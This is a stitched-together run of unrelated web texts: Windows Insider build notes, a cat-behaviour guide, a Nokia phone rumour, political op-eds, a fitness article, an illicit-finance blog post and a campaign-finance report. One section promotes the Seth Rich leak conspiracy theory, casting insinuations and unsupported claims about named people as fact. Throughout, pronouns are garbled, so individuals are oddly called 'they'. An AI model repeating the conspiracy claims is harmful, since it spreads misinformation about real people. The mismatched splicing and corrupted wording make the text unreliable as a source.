We fixed an issue resulting in nothing happening if you attempted to expand a Skype notification in Action Center. We also fixed an issue where the scrollbar would draw with no margin from the chevron and X in Action Center notifications, and one where app logos might be missing from the Action Center.
We fixed an issue resulting in the cursor not showing up when interacting with the system using a Wacom tablet.
We fixed an issue where the Settings app could open to a blank page after selecting a settings page via search results.
We fixed an issue where the File Explorer window might navigate back to Quick Access after deleting something from the current folder in view. We also fixed an issue where right-clicking on the desktop might result in showing a spinning curser for a long time before the context menu would show.
We fixed an issue resulting in existing reminders failing to display in the Cortana UI, and an error when attempting to save a new reminder.
We have updated the Mobile Hotspot settings page to allow name, IP address, and mac address to be selectable so it can be copied elsewhere if needed.
We fixed an issue where the battery flyout might not report the correct overall charging state for devices with two batteries.
We fixed an issue where the title bars of apps using dark theme wouldn't be dark when the window was not in focus, for example, Groove Music or Settings app.
We fixed an issue resulting in you sometimes seeing a progress indicator before the background image would load on the Lock screen.
ADDED 6/15: We fixed an issue where Text prediction using the Japanese IME would freeze your PC. If you turned the prediction setting off for workaround, please turn it back to on. You can do this by right-clicking IME mode icon “A” or “ あ ” in systray and selecting “Properties”, clicking “Advanced”, and navigate to the “Predictive Input” tab and check on “Use predictive input system”.
Improvements and fixes for Mobile (Build 14364)
We made some fit-and-finish updates to the Settings app such as tightening the spacing between checkboxes (like on the Sounds settings page). We also fixed an issue where settings pages wouldn't show a progress indicator if they needed a while to load.
We fixed an issue where a number of app logos were missing from notifications, despite them being visible in the Action Center.
We fixed an issue where the Alarms and Clock Live tile would still show that an alarm was active after a one-time alarm had gone off and been dismissed.
We fixed an issue where Cortana would prompt you to unlock your device before reading a text over Bluetooth.
We fixed an issue resulting in Microsoft Edge crashing when trying to scroll certain webpage.
We fixed an issue where disconnecting from Bluetooth speakers would result in the phone being set to vibrate if it hadn't already.
Known issues for PC (Build 14366)
The Desktop App Converter Preview (Project Centennial) will fail to run on the Windows 10 Insider Preview Build 14366. If you are a developer utilizing the converter tool to convert your desktop app to UWP, we suggest skipping Build 14366 or switching to the Slow ring until we can fix this issue.
If you click on a file download link outside of Microsoft Edge, sometimes Edge will open a tab and close it without doing anything. The workaround is to go to the Download pane and start the download there by clicking “Save” or “Save As”.
Narrator does not launch when you toggle switch to “on” via Settings app > Ease of access > Narrator.
Known issues for Mobile (Build 14364)
You won't be able to deploy an app via Visual Studio 2015 Update 2 to a phone running this build. As a workaround – you can deploy the app by using the Windows 10 Application Deployment (WinAppDeployCmd.exe) command-line tool. We are working to get a build out with this fixed as soon as possible.
We are investigating data issues with some Dual-SIM devices where cellular data doesn't work correctly with a second SIM. Several issues relating to cellular data with Dual-SIM devices have been reported by Insiders with the last two Mobile builds and we're investigating these reports.
After installing this build, you may notice your Quick Actions icons are not in the same order. This is a side effect of the fixes/changes we made to Action Center. To re-arrange your icons to your preferred order, just go to Settings > System > Notifications & actions > (Quick actions) and touch, hold, and then drag to re-arrange icons to whatever position you want. Remember: the four items in the top row are what will show as your immediately viewable Quick Actions.
That's it for now. We'll share our bug bashing pics and we hope you do too. Keep hustling,
Dona
Updated June 20, 2016 10:02 am
Animal behaviour experts have worked with Cats Protection to produce a guide to help pet owners know what their cats want.
It helps explain often contradictory behaviour by these precious animals – like why they often scratch and bite when they appear to want their stomachs rubbed.
The guide also includes advice about how to respond to these signals and common misinterpretations made by cat owners.
Among the signals they say to look out for are:
• The greeting – when the cat walks towards you with its tail up, it means it is saying hello
• The sign of trust – when the cat rolls on its back exposing its stomach it is showing it trusts you rather than wanting its belly rubbed.
• The leg rub – when the cats rub its head and body against your legs it is saying you smell strange and is trying to mark you with its scent
• Flattened ears – when the cat flattens its ears it is frightened and needs somewhere to hide
• Licking of lips – while after eating this can just be it is cleaning itself, at other times it can be a sign of nausea or stress
• The slow blink – the cat will slowly close and open its eyes, turning its head to one side, meaning it is relaxed and is not feeling threatened
Nicky Trevorrow, Cat Protection's behaviour manager, said: “They are quite complicated and subtle in their behaviour, much more so than social species like ourselves and dogs.
“When a cat throws itself on its side and shows its belly, most people misinterpret this behaviour and think that it wants its belly rubbed but will get grabbed by their hand and the cat will bite them.
“What the cat is actually doing is showing a greeting behaviour and showing trust. It is actually an abuse of that trust to stroke its belly. What the cat would rather you do is to give it a slight head rub.
“When a cat comes towards you with their tail upwards, it is a sign of their greeting. The best thing to do is to acknowledge their greeting and give their head a rub.”
The charity produced the short three minute video guide after conducting a survey of 1,100 cat owners to see what they thought their pets were trying to communicate.
Three quarters of those asked did not know that the cat's upright tail meant it was pleased to see them, while a third thought a cat wanted its tummy tickled when it lies on its back.
A third of owners also failed to recognise a slow-blinking cat as meaning they were content and 65 per cent thought a purring cat means it is always happy, but it can also be a sign of pain.
Half of owners were unaware that cats show stress by licking their lips and a quarter thought cats shed hair intentionally to mark their territory.
Mrs Trevorrow added: “If a cat is stressed it is really important to give them a place to hide and to get up high.”
A recent study showed that dogs make subtle facial expressions that help to convey how they are feeling.
Mrs Trevorrow added: “Unlike dogs and humans, cats have not evolved the complex facial muscles that allow them to make obvious expressions.
“They are more subtle and can be difficult to read, so owners also need to look for non-facial signals that can indicate how their cat is feeling.”
VIDEO URL
Google
The Nokia name may get to live on with at least a couple of high-end phones reportedly set to debut in late 2016 or early 2017.
HMD Global, which purchased the Nokia brand from Microsoft this past May, is said to be developing two Android smartphones with a metal design and the "famous Nokia feel," Nokia fan blog NokiaPowerUser said on Saturday, citing "trusted sources."
Both phones would be equipped with the upcoming Nougat flavor of Android, said NPU, which also focuses on Windows Phones. A fingerprint scanner and a highly sensitive camera sensor will also be part of the package, NPU said. Based on Nokia's work with Graphene material, the imaging sensor may be the most sensitive one ever found on a Nokia phone, according to the sources.
Microsoft's 2013 move to acquire Nokia's Windows Phone handset business never panned out in a market dominated by Apple and Android. By dumping Windows Phone and hopping on the Android bandwagon, HMD is looking to convince consumers to give the Nokia brand another shot.
Marketed as "sturdy and robust," the two phones would be resistant to both water and dust, NPU said. The smaller of the two phones would sport a 5.2-inch screen, while the larger will offer a display of 5.5 inches. The resolution hasn't been confirmed, NokiaPowerUser said, but it will likely adopt a QHD (2,560x1,440-pixel) display.
The phones may also offer an improved version of Nokia's Z-Launcher interface, which tries to learn how you use your smartphone and adapt itself accordingly.
The two phones and possibly one or two other Nokia Android phones are due for release around the end of 2016, the sources said. But based on testing and development, the time frame may change to the first quarter of 2017, the sources added.
Subsequently, Hillary Clinton's two successors as first lady have reverted more to the wife, mother and homemaker stereotype. Even though Michelle Obama has recently been reported making more political speeches than during their husband's election campaign, they always cast themselves as a mother first. I found myself annoyed with Michelle Obama's speech at this summer's Democratic Convention. I watched the speech at the urging of my mother, who found it powerful. I found it frustrating, because I felt it cast child raising as the only important task a woman can undertake. Even though Hillary is a mother, I have never heard that message come from them
When Bill Clinton first took office as President, Hillary did not just find a socially acceptable cause and champion it (Nancy Reagan: drug abuse, Lady Bird Johnson: litter etc.). They took on one of the most pressing policy issues of the day: America's broken health care system. It was a difficult task and it proved insurmountable for them at the time. But no one else had a fix for almost 20 more years and even Obamacare is much less ambitious than what they had attempted in 1993. Of course you have to be ambitious to try and solve a seemingly intractable policy problem.
As an American living in London, I have had many British people ask me about the American presidential election. One of their most frequent questions is why people seem to hate Hillary Clinton so much. It's a question without a single clear answer and one I've spent a lot of time thinking about.One of the answers, and one that I personally find saddest, is that they are seen as being too ambitious. To understand this, one has to look back at the 25 years that Clinton has been in the public eye, first as First Lady and later than US Senator from New York and then Secretary of State.As a teenage girl in 1992, I found Hillary Clinton an exciting breath of fresh air as our potential first lady. Unlike their predecessor (and “opponent” in the 1992 election), Barbara Bush, they aren't trying to be America's favourite grandmother or the nation's chocolate chip cookie baker-in-chief. They were a career woman, of the sort I aspired to be.I will also note the positive influence of women's colleges in nurturing ambitious women. Both Hillary Clinton and I graduated from all-women's undergraduate institutions. These colleges train women to be leaders in their fields and an impressive range of women have graduated from them who are leaders in industry and academia as well as politics.
But some Americans did not like their First Lady demonstrating ambition. The right-wing elements of the media attacked them for their work on health care and all sorts of other alleged misdeeds. Once there is a media narrative about a person, the public are more inclined to believe stories about that individual that fit the narrative, no matter how otherwise implausible they might be.
People have argued that Hillary Clinton has ridden their husband's coat tails. There is no doubt some truth to this and it is part of a broader pattern. Many of the early women elected to the US Senate and House of Representatives were filling seats vacated by their husbands (or in some cases fathers). Why should it surprise us that the first serious female candidate for president would have served a stint as first lady before? But their accomplishments since then – the work they did as US Senator and Secretary of State – have been hers. No doubt their husband has provided advice and guidance, as any spouse would, but the work has been hers.
A Story to be Buried: The Seth Rich Case
For almost a year now, we have heard the caterwauling from the Progressive/socialists and the sycophants that they have in the media about how President Trump has worked with the Russians to destroy our Republic. Started the day after the election loss of Queen Hillary, the Clinton team started first with blaming their loss on sexism. When that didn't work the went to the theory of Russian collusion with the Trump administration. A few phone calls to the media and the friends that had hidden in the intelligence services, and with the help of the Obama administration, they have been bellowing ever since about how the Russians “hacked our elections. They claimed Trump themselves were under investigation, that 17 intelligence agencies agreed with the opinion that the Russians had colluded with Trump to “steal” the election.
The question is, is this just a bad movie rerun, and do the people in this country believe the narrative? There will always be the die-hard socialist Hillary supporters who still believe is not the slimy criminal that their own actions have proven, but most people are now ignoring the MSM and talking heads breathlessly passing on fake news and outright lies to attempt to undermine Trump. Even CNN doesn't believe this garbage as shown by James O'Keefe Project Veritas videos.
Let's look at a few of the missteps made so far:
There weren't 17 intelligence agencies that signed off on the opinion of collusion. It is now being told that there were four, a lie told by mainstream media for months. The report was actually made by only twelve intelligence agents who have not been named, and authorized by DNI Director James Clapper.
A former CIA analyst named Fred Fleitz told Fox News a handpicked group of 12 analysts were responsible for the US intelligence report which blamed Russia for “hacking the election” and believed it was “rigged” and “fabricated by pro- Obama intelligence officials”. What was produced was a report based on innuendo and not facts.
There have been numerous leaks about and information withheld from the Trump administration by the intelligence agencies following the idea that “I know what's best for foreign policy and national security”. Words that were first spoken by Aldrich Ames, who was responsible for the death of over 100 agents in the 1990's, and is applicable to many that are in our intelligence agencies today.
The FBI never saw the DNC Server supposedly hacked but allowed an organization with a dubious past to investigate the hack ( or leak) and report. No second opinion was ever given, and no one in the government ever verified that information from Crowdstrike. This is the basis for the Russian narrative, second hand information from a company who had their chief counsel appointed by Obama to the post of commission on Enhancing National Cyber security. It was the DNC who refused to turn the server over to the government.
In essence there is no credible evidence of collusion, so now the Progressive/socialists have moved to obstruction. The question is now, who actually leaked these e mails? There are now many questions about who and when the information from the DNC and John Podestas e mails were made public. Everyone blames WIKILEAKS for making them available, but who gave them to Julian Assange? Both the Russians and Julian Assange have stated that they did not work together has not stopped the non stop wailing from those on the left and the media about Trumps supposed “crimes”.
There is another explanation which the media, the government, and the left refuse to discuss. They can't discuss this, because it would show the criminal aspect of the left more than just the e mails.
The story that needs to be forced on those investigating the leaks is the story of Seth Rich. On July 10th, 2016 Seth Rich was mowed down in a Washington D.C. residential district, shot twice in the back . Still alive when attended to in the hospital, they died soon after for unknown reasons. Noting was taken, their watch, wallet and phone still on the body. The Washington D.C. police unbelievably declared it a robbery turned homicide.
Just mentioning Seth Rich to the left causes panic and the intensified effort to delegitimize anyone who discusses it. The Washington Post slandered Newt Gingrich because they discussed it. Sean Hannity has been vilified, their advertisers threatened by the George Soros financed David Brock at Media Matters. Even the original dtetive assigned to the Seth Rich murder investigation was contacted by Donna Brazile, former DNC chair and theone who gave CNN questions to Hillary during the debate and they demanded to know why they were working on the Seth Rich murder case. I don't understand how this was in the purview of Brazile. John Podesta is knee deep in this as well, as a leaked WIKILEAK e mail spoke of Podesta stating any leaker should me “made an example of” whether or not we have any real basis for it.
One America Network placed a post on a online message board for information on the doctor on duty that night when Seth Rich died, within an hour the OAN website crashed.
They attempt to use their fascist tactics and economic terrorism to further the agenda of shutting down any investigation or even discussion of Seth Rich. This is all part of the plans that David Brock has promulgated to all that can help in destroying the Republic. (http://www.intellectualconservative.com/dont-believe-david-brocks-and-media-matters-lies/
The fact that Seth Rich may have been the leaker is not proven, but it is instructive that the mere mention of their name brings the full force of the left down on anyone of any stature who mentions it. The left wants no investigation of the DNC and the socialist operatives who control it. A Seth Rich investigation would collapse the house of corruption that is the DNC and could very well uncover criminal acts committed by members of Congress and DNC operatives.
Julian Assange has offered a $20,000 reward for information leading to the arrest and conviction of the murderers. At this time there is no proof that Rich was the leaker, although there were communications between WIKILEAKS founder Julian Assange and Seth Rich, reported to be 40,000 e mails in all.
The Seth Rich murder investigation originates in Washington, D.C. The Assistant US Attorney in the Attorneys office for Washington,D.C. is a man named Steven Wasserman who is the brother of Debbie Wasserman Shultz, the disgraced former DNC Chairman. The videos that could show what happened from surrounding establishments have never been seen, and supposedly no one knows where they are. The officers who responded to the Seth Rich shooting were wearing body cameras, where are the videos and have they been seen. The Metropolitan Police have said that all this footage was “lost”.
The Rich family, who originally asked for public assistance in finding their son's murderer have since requested that the investigation be stopped. Could the reason for that be that they were “given” a new family spokesperson, Brad Bauman, a professional Democrat Crisis PR spokesperson?
The Mainstream media and Dem operatives, (I know, I repeat myself) call the Seth Rich murder a conspiracy pushed by the alt-right. I might be convinced to admit there is nothing there if these questions could be answered.
What did Seth Rich say to the police? What was the condition of Seth Rich after surgery? Who were the doctors and nurses who took care of Rich, and what do they say? Where is the laptop that Seth had in their possession and why is it contenting not available to anyone? The laptop has been in Metro PD possession, but they needed assistance from the FBI to unlock it. 44,055 emails were found and 17,764 attachments. This information has not been shared with the press, why? Who ordered the DC police to stand down? Who pushed Brad Bauman on the family and why? Why is this story not being investigated by the press? Have they been ordered not to9, and by whom? Why is social media shutting down information on the story? Why did Dona Brazile get involved in closing down the investigation and by what authority?
There are files in FBI possession about Seth Rich coded: (SCRDC-408) that are heavily redacted. Why? And who has seen them?
Further investigation of the “Russia hacking” theory has shown that the metadata was likely done on a computer that had direct access to the data taken. The hacking also shows that the leaked material was copied in the Eastern Time zone, conveniently the same time zone as Washington D.C. The speed of transfer of the data (22 mb/sec is unlikely to be used remotely over the internet. The left has made a great deal of denigrating Craig Murray, former British ambassador to Uzbekistan who received some of the leaks and stated that the leakers were not Russian and they were Leaks and not “hacks”.
Now , following the one year anniversary of the Seth Rich murder, the MSM is once again going full steam ahead to denigrate any and all who question the progressive/socialist narrative that they are promulgating to the public. Calling it a “far right conspiracy”, they still can't answer the questions above or many others that are being asked. Being complicit may be the main reason why the MSM wants this story buried.
I answer a lot of questions. I answer my phone, emails, and texts. I give a lot of workshops and I spend a fair amount of time on the Internet.
One of the things that finally occurred to me recently is this – people are wonderful about reading articles and books, but sometimes they miss the point.
As I readily admit, it's my fault. I love experimenting, testing, and adapting good training ideas. My mistake is that I write up a little article or blog post about Tabata front squats or slosh pipes or the "Big 21" program. This is the start of the problem. People then read the article and are left with a big issue. And this is the point I'm trying to make here.
Not every good idea, training device, or diet can or should be done at once. In past articles, I've tried to explain this with terms like "Warrior," "King," and "Park and Bus Bench." Recently, I came to discover that I have to simplify it even more by using two words:
Reasonable
Tough
Reasonable is a fairly tame word, but it's rare today. Clint Eastwood has a marvelous quote (perhaps to an empty chair?):
"I tried being reasonable, I didn't like it."
I think Clint perfectly sums up the issue when you apply it to reasonable dieting and reasonable workouts. Let's be honest, they aren't very sexy. A reasonable approach to fitness lacks all the fun adjectives that define our business, but, most of us can handle "reasonable" for a fair amount of time.
Tough is more fun. I don't use any other terms any more because they may have been copyrighted. I do, however, have a handy tool for any of you wanting to put out your own e-book.
Simply pick one word for Column A, one from Column B, and one from Column C:
Column A Column B * Column C Secrets Dynamic Strength Rules Metabolic Mobility Fundamentals Easy Speed Tools Simple Endurance Vision Radical Flexibility Power Effortless Power Habits Tactical Bodybuilding Instant Training Combat Physique Brutal Body Punishing Habits Military Conditioning Powerful
* For variation, preface your column B choice with a number, usually "Three," "Five" or "Seven."
Then fill in this form:
The (Insert Choice From Column A) of (Insert Choice from Column B) (Insert Choice from Column C) program.
I'm as guilty as anyone here and I hope everyone takes this in the spirit of fun. Feel free to add your own descriptors, of course.
"Tough" workouts are what we tend to look for here at T Nation. If I write something about a workout that will make you puke, I'll get emails about it for years.
Are you interested in a tough diet? Maybe I can find you a link for the Velocity Diet somewhere here. Remember, and this is crucial, Chris Shugart sold the idea (after I begged them to do it) to me as a psychological makeover. I have to agree it was psychological, because after 28 days, I felt like a psychopath.
One of the articles that really turned me on to T Nation was Chris' series, "Eat Like a Man." It combined five days of high protein and high fat with a weekend of carbing up.
I adapted this for my athletes and I still use this as my "diet" template for strength athletes. I still think "Eat Like a Man" is a reasonable way to approach eating for someone "clean" who needs to build the qualities of power for sports.
It's the mix that people miss. I want to address that here. If you think of a simple quadrant, I'd like to chart out the next few years of your training the following way:
Reasonable Workouts, Tough Diet
Reasonable Workouts, Reasonable Diet
Tough Workouts, Reasonable Diet
Tough Workouts, Tough Diet
Let me address each quadrant.
Reasonable Workouts, Tough Diet
Most of us turn to diet to deal with our fat loss needs. Having said that, years ago at one of my workshops a noted professor (you'll see why I withhold details in a moment) told me, "Hell, we know how to get you to lose fat and weight: tie you to a tree and come back in three days."
I guess this works, folks, but I struggle to recommend it. Of course, that is going to be the only message some of my readers will take away from this: "Hey, Bubba...tie me to a tree!"
Tough diets work. We all know that. Adherence is an issue, of course, but tough diets do the job. I have issues when I try to diet hard; I turn into a real jackass. But, tough diets get the job done for me. I've lost a lot of weight really fast for lifting meets.
I think when you dive into a tough diet, you need to do reasonable workouts. What are reasonable workouts? Well, most of the time, I recommend that you do the basic human movements in your training:
Push
Pull
Hinge
Squat
Loaded Carries
In the archives here at T Nation, I've addressed each of these in great detail. For reasonable workouts, I tend to have people live in the 15-25 total reps range for each movement. You should easily recognize these workouts. The classic workouts live in this range:
3 Sets of 5
5 Sets of 5
3 Sets of 8
The "5 x 5" workout was popularized by Reg Park half a century ago and it was the basis of most of Arnold's mass building phases. Five by Five in the bench press, row, deadlift, squat and farmer walks as a finisher is enough work for anyone.
For load, I have a simple formula:
If you can't do 15 reps total, the load is too heavy.
If you can easily do over 25 reps total, the load is too light.
If you're getting those reps and, over time, increasing the load, you're getting it right. If you haven't added plates in a while, consider this as the real issue behind your lack of progress.
If you're putting all your energy into your eating plan, pick a workout you know you can do. At best, I think you can only follow a hard diet about twice a year. So, pick a training program that you know how to do, understand how you tend to recover, and, most importantly, know you won't have to use a lot of mental energy in terms of discipline and free will to complete.
Reasonable Workouts, Reasonable Diet
I think that we should spend most of our training year (probably a better term is "Training Decade" or "Training Lifetime") combining Reasonable Workouts with Reasonable Diets.
A few years ago at a clinic in Colorado Springs, we were told that our diet should center around three items:
Lean Protein Sources
Vegetables
Clear Water
It's still pretty good advice. I've gone to several workshops in the past few years concerning the Mediterranean Diet and the two approaches seem to be in step with each other. Now, if you thrive on Atkins, Paleo, Zone, Ornish or whatever and find it's "your way of eating" and not your diet, this would be your reasonable diet.
Most of your life should be in this method of reasonable and reasonable. It seems reasonable.
Tough Workouts, Reasonable Diet
For me, these are peaking periods of life. As a kid, I called these periods "The Big Push." As I geared up for track season or an Olympic lifting meet, I knew it was time to spend extra time in the gym, the track, and the field. The plan expanded. Not only did the quality of movement need to improve, but the quantity needed to go up.
I visualize peaking as pulling a rubber band in a classroom. If you keep stretching and stretching the band back, it's going to snap in your face. You have to let it go to hit the pretty girl in the fourth row.
And that's the key to Tough Workouts. Marty Gallagher plans these for twelve weeks; Tommy Kono planned an eight-week peak; and Dave Turner (my lifting coach) plans eight weeks of increasing load followed by two weeks of perfect practice and then competition.
The Soviet Squat program I used to do was six weeks of squatting long and hard three days a week.
If you're truly doing a tough workout, your way of eating has to be built in and simple. Hopefully, your habits are such that you support your training with "big kid" food choices.
For years, I believed that tough training could outrun any diet choices. From my experience and observations from others that I trust, as well as some long discussions with some of the brightest minds in sports nutrition, I learned I was wrong. Again.
Make wise food choices while ramping up your training! Like a tough diet, most people can do tough peaking programming perhaps twice a year. I've encouraged my older athletes (somewhere around the mid-twenties) to think about a minor peak each year and progress to a major peak upon that later. Again, it's reasonable, doable and repeatable.
Tough Workouts, Tough Diet
Everyone thinks they can do this, but, really, it's a rare bird that can both diet hard and train hard. Years ago, I had two bodybuilder friends who would help each other out for contests. One day, Lance gave me a call and asked if I could help them train. The other lifter, George, was just a week from the platform. They were living on lettuce. That's it. That's a "Tough Diet."
They would do a set, then lie on the ground. It was my job to stir him, pick them up, and push them along to the next set. Then, bang to the ground again. When the timed rest period ended, I picked them up and away we went.
Personally, I can't follow this type of thing. Maybe once every four years or so I could sum up the energy and resources to make a run at training like this, but it would have to be really worth my time and effort. Something big would have to be on the line.
Yet, when I read the Internet, it seems that everybody is training with a vengeance and only eating straw mixed with protein powder. Hats off to you!
Off Workouts, Off Diet
This is something I never understood until recently. Every so often, stop worrying about everything. Go to an all inclusive resort, don't train, and eat what you feel like and really forget about things. I learned a lot about humanity on a weeklong cruise, I can tell you.
For the record, if you haven't suntanned in a while, don't spend day one drinking beer in the sun all day. I saw a lot of that. Also, women who drink heavy in a hot tub seem to leave the tub with fewer clothes then they started. These are lessons I didn't know I needed to know.
So, the idea behind all of this is fairly obvious. Structure your year or decade in a way that you can swim through various periods of really hard training and some attempts at strict dieting but with an eye to long periods of intelligent progressive resistance training.
When I read a great diet idea or training idea, I file it in my expansive collection of materials. I let the idea simmer for a while and then find a place in my year where I can apply this plan.
It's that simple. It's that reasonable.
Illicit Flows in the Poorest of Places
SHARE
Illicit Financial Flows Have a Devastating Impact on the Poorest Countries in the World
What do you do when “the big number,” used to estimate the global volume of illicit financial flows (IFFs), begins to lose its luster?
Over the past year or so, GFI has begun to hear—in various venues and by various people—the warning to audiences that they shouldn't “focus on the big number.” A trillion dollars is a global number, these observers say, and can't be used to assess the impact at the country level. Or, they contend, the trillion dollars in IFFs is from a cluster of emerging market countries and therefore is skewed to make it look as though all developing countries have huge problems when really only a few do. GFI decided to go back to the data to see if the criticisms were accurate.
As a result, this week we are publishing “Illicit Financial Flows and Development Indices: 2008–2012,” a study that looks at illicit flows from the poorest countries to determine the development impact in those places that do not appear on the top-10 list of IFF-source nations by gross volume. Rather than focus on the Chinas and Russias and Mexicos of the world, we examined IFFs in nations that appear, for example, on the Least Developed Countries list or the Highly Indebted Poor Countries list—82 countries in all were examined. What we found was simply alarming.
For example, of the countries studied, one-quarter have an IFFs/GDP ratio of above 10 percent; 32 have IFFs that are greater than 10 percent of total trade; 20 have IFFs that are greater than the combined total of ODA + FDI. More specifically, Ethiopia's IFFs were 1,355 percent of FDI, Nicaragua had IFFs that were over 20 percent of the country's GDP, and IFFs in Rwanda were almost 52 percent of its total tax revenue. What is clear is that, if any other phenomenon had such a countervailing economic impact, it would be cause for massive headlines and a rush of analysis from the key multilateral aid institutions. But, given that these forces are due to illicit flows, it is only recently that the world has begun to pay attention.
What we learned is that:
The absolute size of the flow doesn't really matter: even in countries with relatively low IFF-volumes, the impact on the economy can be highly corrosive; The size of the country doesn't matter: Nepal and Nigeria both show signs of serious challenges related to IFFs; and One size does not fit all: the impact in different countries manifests itself in different ways, such as IFFs as a percentage of GDP or FDI or trade.
The other thing we came to understand more clearly is that—while “the big number” does matter with regards to conceptualizing the systemic, global scale of the scourge of illicit financial flows—the impact of IFFs on the ground in specific countries matters just as much if not more. How those individual countries can begin to address the challenges before them will determine their ability to prosper.
Finally, we learned that very, very few developing countries do not have a problem with illicit flows.
The Financing for Development Conference (FfD) and Sustainable Development Goals (SDGs) will both be completed in the next few months. These two processes provide the best opportunity to impact illicit flows with a global focus and for a sustained period of time. Unfortunately, the two main camps—the G77/China on one side and the U.S./EU on the other—are quite far apart in their views on addressing this issue. Disagreements on an IFFs definition, the ability of nations to eliminate IFFs, and difficulties in estimating them are the primary stumbling blocks.
GFI is suggesting the two sides begin to focus on curbing ‘trade misinvoicing,' which moves almost 80 percent of all measurable illicit funds offshore, as a way to find common ground and a practical approach to reducing illicit money leaving developing economies. Halving trade misinvoicing by 2030 is specific, measurable, and achievable—a recipe for success.
Image Credit: Zoriah/Flickr [CC BY-NC 2.0]
PoliZette Red Sox Legend Curt Schilling to Take On Elizabeth Warren Pitcher who brought Boston to two World Series might mount populist Senate bid in Massachusetts
Boston hometown hero Curt Schilling announced their intention to challenge Sen. Elizabeth Warren in the Massachusetts 2018 Senate race Tuesday.
In an appearance on Rhode Island radio station WPRO, the former Red Sox star said they are certain of their intent to run — although they haven't yet discussed the possible bid with their own family.
“I've made my decision. I'm going to run.”
Advertisement
“I've made my decision. I'm going to run,” Schilling said. “But I haven't talked to Shonda, my wife. And ultimately it's going to come down to how their [sic] and I feel this would affect our marriage and our kids.”
An electoral matchup between Warren and Schilling would surely make for spectacular spectator sport.
An outspoken conservative and early and ardent supporter of Donald Trump's presidential campaign, Schilling is likely to continue to spread Trump's anti-Establishment, anti-globalist message.
[lz_ndn video= 31526177]
Indeed, just hours after hinting at their intention to mount a bid against Warren, liberals in Massachusetts were already trying to tie Schilling to the GOP nominee. Massachusetts Attorney General Maura Healey tweeted, “[Schilling] is TrumpLite.”
Advertisement
As a hero of blue-collar, anti-elitist baseball fans throughout Massachusetts, Schilling is in a unique position to try to capitalize on the same populist appeal that has brought Trump within striking distance in other traditionally Democratic states. By contrast, Warren, the cold and calculating academic, is a living, breathing caricature of elitist arrogance and aloofness — even if they profess to stand for a progressive brand of populism.
As one would expect from an outspoken supporter of Trump, Schilling is also an outspoken critic of Clinton — which could be another potential benefit should Clinton get into the White House. In March, Schilling said in an interview that Hillary Clinton should be in jail.
“If I'm going to believe, and I don't have any reason not to believe, that they gave classified information on hundreds if not thousands of emails on a public server after what happened to Gen. Petraeus, they should be buried under a jail somewhere,” Schilling said during an interview. “If she's allowed to get to the general election before she's in prison, I'll be stunned and I'll be upset.”
Schilling's run would not be easy. The former pitcher has landed in a number of controversies over the last year or so. In September 2015, Schilling was suspended by ESPN for a tweet that compared radical Islam to Nazism.
One would think that comparing radical Islam — a violent, anti-Semitic totalitarian ideology — and Nazism, which also happens to be a violent, anti-Semitic totalitarian ideology, would not be so controversial, but ESPN bowed to manufactured liberal outrage.
[lz_related_box id=”31975″]
Advertisement
Schilling was able to survive the incident, but another interaction on social media this year ended up costing them their job. In April, Schilling posted an image of a fat man disguised poorly as a woman, with the accompanying text, “LET HIM IN! to the restroom with your daughter or else you're a narrow-minded, judgmental, unloving racist bigot who needs to die.”
This time, however, Schilling's satirical jab at the progressive powers that be — in this case, in the argument for gender identity — was too much for ESPN, which promptly fired him.
While Schilling's outspokenness could be a hindrance in their efforts to win a Senate seat in deep blue Massachusetts, it is also a major reason for their popularity — much like Trump's. “A lot of people have told me in the past — ‘You tell it like it is,'” Schilling said in 2015. “I try to explain to people that I don't. I tell it like I think it is.”
New tax documents obtained by OpenSecrets Blog suggest that one of the oldest, most politically active nonprofits in the country, VoteVets Action Fund, devoted most of its activities in 2014 to influencing that year's midterms.
Vote Vets Action Fund — which last week attacked the presumptive GOP nominee, Donald Trump, as a “cheap fraud” — is currently the highest spending liberal nonprofit active in federal elections, a perch it is accustomed to holding. Fueled largely by social welfare organizations aligned with Democrats and millions of dollars given by unions, VoteVets — with just two employees and no volunteers — has spent more on elections since its founding in 2006 than the combined spending of much more prominent politically active groups on the left, like NARAL Pro-Choice America and the Sierra Club, according to reports filed with the Federal Election Commission.
Electioneering as social welfare
The new tax documents show that between July 2014 and June 2015, VoteVets spent nearly $7.6 million overall. During that same period, VoteVets' filings with the FEC indicate it spent more than $3.6 million supporting Democratic candidates or opposing Republicans.
Social welfare organizations like VoteVets are not supposed to be primarily political, though neither the IRS nor the FEC has shown an appetite for policing them. That, combined with the fact that they don't have to disclose who their donors are, has made 501(c) groups — also known as “dark money” outfits — attractive vehicles for contributors with a strong desire to influence politics but just as powerful an impetus to remain in the shadows. Political spending by these organizations reached new heights in 2014's congressional races and is on track to break new records in 2016.
The vast majority of dark money is spent by GOP-aligned groups — more than 72 percent of the 501(c) groups reporting activity to the FEC in 2014 were conservative, and in the last presidential election cycle, that total was more than 86 percent — but Democrats also have stalwarts in this category that provide them with reliable support in most election cycles. VoteVets is one such group.
In the last five election cycles, VoteVets has spent more than $12 million, including the more than $600,000 it has reported spending so far in the 2016 cycle supporting Rep. Tammy Duckworth (D-Ill.), who's running for Senate. That's a total that is dwarfed by groups on the right like Crossroads GPS, whose spending is measured in the hundreds of millions, but it puts VoteVets among the biggest all-time spenders on the left.
VoteVets the newest tax return displays all of the main hallmarks of a political organization using its 501(c) status as a way to avoid donor disclosure. By far the largest outlays it reports were related to political activity.
More than $2 million, the group says, went towards “independent expenditures” — communications that explicitly advocate for or against a candidate for office. Such ads are generally considered unambiguously political for tax purposes, meaning that a 501(c)(4) organization like VoteVets can't claim them as a part of their tax-exempt activity.
That $2 million tracks pretty closely with the total VoteVets reported to the FEC. But it also reported another $1.6 million in “electioneering communications” to the agency. These are “issue ads” run close to an election that mention a candidate without explicitly calling on viewers to vote for or against that person. Often these ads, like this one, are meant to boost a candidate, and some of VoteVets “issue ads” went so far as asking “who will bring fresh leadership to Congress” and contrasting the desired candidate with their or their opponent.
Together, the $3.6 million VoteVets spent on these politically charged ads is considerably more than the $3 million VoteVets told the IRS it spent on political expenditures and puts the group very close to breaking the de facto 50 percent limit on political spending by 501(c)(4) groups.
And evidence suggests that VoteVets' political activity goes beyond the specific expenditures reported to the FEC. In the section of its tax return where it lists payments to its highest paid outside contractors, four of the five companies listed — Waterfront Strategies, Buying Time LLC, Sway and Prism Communications — are the same political media firms VoteVets used for the political ads it reported to the FEC. Payments to these four firms came to more than $6.5 million, or 86 percent of Vote Vets overall expenditures.
VoteVets representatives have not responded to questions from OpenSecrets Blog about the nature of those payments.
No single big donors, but a lot of big labor money
